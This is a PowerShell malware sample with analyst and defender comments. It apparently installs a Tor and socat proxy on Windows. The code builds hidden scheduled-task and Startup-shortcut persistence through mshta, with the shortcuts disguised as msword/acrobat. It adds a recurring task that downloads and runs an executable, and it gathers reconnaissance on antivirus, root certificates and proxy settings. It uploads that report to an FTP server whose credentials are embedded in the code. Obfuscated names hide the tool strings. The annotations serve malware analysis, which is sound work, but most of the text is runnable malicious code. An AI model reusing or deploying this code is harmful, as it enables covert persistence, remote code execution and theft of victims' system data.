- $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20));
- }
- $Settings = New-ScheduledTaskSettingsSet;
- $Settings.DisallowStartIfOnBatteries = $False;
- $Settings.StopIfGoingOnBatteries = $False;
- if($restart -eq 1){
- $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString);
- }else{
- $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString);
- }
- Start-ScheduledTask -InputObject $Task;
- };
- Default {
- # Same task shape built through the Microsoft.Win32.TaskScheduler assembly.
- $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
- $td=$ts.NewTask();
- $td.RegistrationInfo.Description = (RandomString);
- $td.Settings.DisallowStartIfOnBatteries = $False;
- $td.Settings.StopIfGoingOnBatteries = $False;
- $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
- $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
- $LogonTrigger.StartBoundary=[System.DateTime]::Now;
- $LogonTrigger.UserId=$env:username;
- $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
- $td.Triggers.Add($LogonTrigger);
- if($restart -eq 1){
- $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
- $TimeTrigger.StartBoundary=[System.DateTime]::Now;
- $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1);
- $TimeTrigger.Repetition.StopAtDurationEnd=$False;
- $td.Triggers.Add($TimeTrigger);
- }
- $tsf="Microsoft.Win32.TaskScheduler";
- $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir);
- $td.Actions.Add($ExecAction);
- $task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
- $task.Run();
- };
- }
- }
- # Downloads $nhhrQGEpp (URL) to $KZqZalXQzaGMBW (path), trying BITS, then WebClient, then
- # bitsadmin.exe via a hidden cmd.exe. Returns $true when the destination exists afterwards.
- # NOTE(review): SecurityProtocol is widened to include ssl3 and tls 1.0 before downloading.
- # Defender note: BITS jobs and bitsadmin invocations from this routine are logged by the
- # BITS-Client event channel.
- function nne {
- param([string]$nhhrQGEpp, [string]$KZqZalXQzaGMBW);
- $ErrorActionPreference = "Stop";
- Write-Host ("Download {0} to {1}" -f ($nhhrQGEpp, $KZqZalXQzaGMBW));
- try{
- [Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls, ssl3";
- }catch{}
- try {
- Start-BitsTransfer -Source $nhhrQGEpp -Destination $KZqZalXQzaGMBW;
- }
- catch {
- #Write-Error $_ -ErrorAction Continue;
- try {
- (New-Object System.Net.WebClient).DownloadFile($nhhrQGEpp,$KZqZalXQzaGMBW);
- }
- catch {
- #Write-Error $_ -ErrorAction Continue;
- Start-Process "cmd.exe" -ArgumentList "/b /c bitsadmin /transfer /download /priority HIGH `"$nhhrQGEpp`" `"$KZqZalXQzaGMBW`"" -Wait -WindowStyle Hidden;
- }
- }finally{
- $ErrorActionPreference = "Continue";
- }
- if ( $(Try { Test-Path $KZqZalXQzaGMBW.trim() } Catch { $false })){
- return $true;
- }
- return $false;
- }
- # Stage 3: installs the proxy components and persistence.
- #  1. Downloads the Tor expert bundle from one of three mirrors into a random
- #     ProgramData directory and registers a logon task (plus a Startup .lnk) that runs
- #     tor.exe hidden through mshta.exe and a vbscript: URI.
- #  2. Downloads socat (GitHub first, a fallback host second) and registers two tasks plus
- #     Startup .lnk files that listen on 127.0.0.1:53904 and 127.0.0.1:5588 and forward
- #     through the local Tor SOCKS port (9050) to %DOMAIN%, a second template placeholder.
- #  3. Registers a once-a-minute task that runs a PowerShell one-liner fetching an .exe from
- #     http://127.0.0.1:5555/ (a port not set up in this listing) with the host's public IP
- #     appended and executing it.
- # The "t"+"or"-style concatenations keep the literal tool names out of the script text.
- # NOTE(review): $vzfkFcawDbIUSya and $toawwyJljC are not assigned anywhere in this
- # listing, so the msword.lnk shortcut is created with an empty working directory and no
- # arguments unless they come from an outer scope.
- # Defender note: tor/socat processes under ProgramData\<random>, mshta.exe tasks with
- # vbscript: arguments, and msword.lnk / acrobat.lnk / sync.lnk in the Startup folder are
- # the artifacts of this stage.
- function ZjLBbVj{
- $schedulerType = InitScheduller;
- $tf=$env:Temp+'\'+(RandomString)+'.zip';
- $gLRlOZOsud=$env:ALLUSERSPROFILE+'\'+(RandomString);
- $yXozjITRBzpQM=@([string]::Concat('https://di','st.t','orproject.org/'), [string]::Concat("https://mirror.oldsql.cc/t","or/di","st/"), [string]::Concat("https://to","rmirror.tb-itf-t","or.de/di","st/"));
- foreach ($pKUDFhhhvNZv in $yXozjITRBzpQM) {
- $maV=$pKUDFhhhvNZv+"torbrowser/8.0.3/t"+"or-win32-0.3.4.8.zip";
- if((nne $maV $tf)){
- break;
- }
- }
- if ((Test-Path $gLRlOZOsud) -eq 1){Remove-Item -Force -Recurse $gLRlOZOsud;}mkdir $gLRlOZOsud | Out-Null;
- mWwT $tf $gLRlOZOsud;
- Remove-Item -Force $tf;
- $HXnQ=$gLRlOZOsud+"\T"+"or\";
- $OEnwgbJEWJe="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"t"+"or.exe`",0,False))";
- FqCZvVAFIWkCT (RandomString) 'mshta.exe' $OEnwgbJEWJe 0 0 $HXnQ;
- Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\msword.lnk" $vzfkFcawDbIUSya $toawwyJljC
- $QDOKSGRmCckng=$env:Temp+'\'+(RandomString)+'.zip';
- $NNHcFwiW=(RandomString);
- $ytfOSwwAAgG=$gLRlOZOsud+'\'+$NNHcFwiW+'\';
- nne 'https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip' $QDOKSGRmCckng;
- if ( $(Try { Test-Path $QDOKSGRmCckng.trim() } Catch { $false })){
- mWwT $QDOKSGRmCckng $gLRlOZOsud;
- $BEqzKhTxCky=$gLRlOZOsud+'\socat-windows-1.7.2.1\';
- Rename-Item -path $BEqzKhTxCky -newName $NNHcFwiW;
- }else{
- nne 'http://blog.gentilkiwi.com/downloads/socat-1.7.2.1.zip' $QDOKSGRmCckng;
- mWwT $QDOKSGRmCckng $ytfOSwwAAgG;
- }
- Remove-Item -Force $QDOKSGRmCckng;
- $s1cmd='socat tcp4-LISTEN:53904,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:80,socksport=9050';
- $s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:5588,socksport=9050';
- $PwzNe="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))";
- $gLvFSMD="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))";
- FqCZvVAFIWkCT (RandomString) 'mshta.exe' $PwzNe 0 0 $ytfOSwwAAgG;
- FqCZvVAFIWkCT (RandomString) 'mshta.exe' $gLvFSMD 0 0 $ytfOSwwAAgG;
- Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\acrobat.lnk" $ytfOSwwAAgG $PwzNe
- Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\sync.lnk" $ytfOSwwAAgG $gLvFSMD
- $jSfqYGyepyLvWfi="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'\\"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))";
- FqCZvVAFIWkCT (RandomString) 'mshta.exe' $jSfqYGyepyLvWfi 1;
- }
- # Run stage 3 (Tor/socat install and persistence).
- ZjLBbVj;
- # Local report file, %TEMP%\<computername>.log; written by LogWrite, uploaded and deleted by UploadLog.
- $Logfile = $env:Temp+"\\$(gc env:computername).log";
- # Appends a timestamped line to $Logfile and echoes it to the console.
- Function LogWrite
- {
- Param ([string]$logstring)
- $dt=Get-Date -Format "dd.MM.yyyy HH:mm:ss";
- $msg=[string]::Format("[{0}]::[{1}]",$dt,$logstring);
- Write-Host $msg;
- Add-content $Logfile -value $msg;
- }
- # Uploads the report over plain FTP, with the account credentials embedded in the URL
- # (the credential pair and host in $dest are indicators for this sample), then deletes the
- # local copy.
- Function UploadLog
- {
- $dest = "ftp://co-j-jp:escoj2013@wx04.wadax.ne.jp/public_html/logs";
- $wc = New-Object -TypeName System.Net.WebClient;
- $wc.UploadFile("$dest/$(gc env:computername).log", $Logfile);
- Remove-Item -Path $Logfile;
- }
- # Collects an install report: OS details, PowerShell version, the HKCU proxy AutoConfigURL
- # (PAC) setting, CurrentUser\Root certificates whose subject matches the two COMODO CA
- # names (which suggests the injected certificate's subject mimics them — TODO confirm),
- # running tor*/socat* processes, a listing of ProgramData and its subdirectories, and the
- # registered antivirus products from root\SecurityCenter2.
- # NOTE(review): `-NOT $Certs.count -eq 0` and `-NOT $avlist.count -eq 0` parse as
- # `(-not x) -eq 0` and produce the intended branch only via bool/int comparison rules;
- # `@psboundparameters` is splatted into Get-WmiObject although this function has no params.
- function CheckInstall(){
- $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages);
- $wininfo.MUILanguages=$wininfo.MUILanguages -join ",";
- LogWrite("OS info: {0}" -f $wininfo -join "");
- if (test-path variable:psversiontable) {
- $version = $psversiontable.psversion;
- } else {
- $version = [version]"1.0.0.0";
- }
- LogWrite("Powershell version: {0}" -f $version);
- try {
- $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop;
- LogWrite("Pac setted: '$pac'");
- }
- catch {
- LogWrite("ERROR: Pac not setted");
- }
- $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*" -or $_.Subject -like "*COMODO Certification Authority*"}|ForEach-Object {"{0} ({1})" -f ($_.Thumbprint,$_.NotBefore)});
- if (-NOT $Certs.count -eq 0){
- LogWrite("Certs installed: '{0}'" -f ($Certs -join "; "));
- }else {
- LogWrite("Certs not found");
- }
- try{
- $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out"; Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out;
- LogWrite("Proccess list:`n{0}" -f ($proc -join "`n"));
- }
- catch {
- LogWrite("ERROR: Can't get proccess list");
- }
- $DestTP=$env:ALLUSERSPROFILE;
- try{
- $dirs=dir($DestTP) -ErrorAction Stop;
- LogWrite("List dir [{0}]: {1}" -f ($DestTP, (($dirs|Select -expand Name) -join "; ")));
- foreach($dir in $dirs){
- try{
- $subdir=dir($dir.FullName) -ErrorAction Stop;
- LogWrite("List dir [{0}]:{1}" -f ($dir.FullName, (($subdir|Select -expand Name) -join "; ")));
- }
- catch{
- LogWrite("ERROR: Can't list dir {0}" -f $dir.FullName);
- }
- }
- }
- catch {
- LogWrite("ERROR: Can't list dir {0}" -f $DestTP);
- }
- $avlist=(Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct" @psboundparameters|Select -expand DisplayName);
- if (-NOT $avlist.count -eq 0){
- LogWrite("Av installed: '{0}'" -f ($avlist -join "; "));
- }else {
- LogWrite("Av not found");
- }
- }
- # Stage 4: waits three seconds, builds the install report and uploads it.
- function StartWork(){
- LogWrite "Start Log module";
- Start-Sleep -s 3;
- CheckInstall;
- UploadLog;
- }
- # Run stage 4 (report and upload).
- StartWork;